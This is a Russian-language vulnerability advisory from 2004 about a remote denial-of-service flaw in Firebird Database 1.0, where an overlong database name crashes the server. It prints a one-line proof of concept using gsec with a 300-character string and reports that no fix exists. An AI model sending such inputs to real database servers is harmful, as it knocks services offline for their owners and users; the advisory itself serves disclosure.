Удаленный отказ в обслуживании целевого сервера в Firebird

Дата публикации:
02.06.2004
Всего просмотров:
1098
Опасность:
Средняя
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Firebird Database 1.0

Описание: Уязвимость обнаружена в базе данных Firebird в обработке имен базы данных. Удаленный пользователь может аварийно завершить работу целевого сервера.

Удаленный пользователь может подключится к базе данных и послать специально сформированное имя базы данных, чтобы аварийно завершить работу целевой базы данных. Пример:

gsec -database 192.168.1.52:`perl -e'print ("A"x300)'` -user whenever -password whatever

URL производителя: http://firebird.sourceforge.net/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Firebird Database Remote Database Name Overflow

или введите имя

CAPTCHA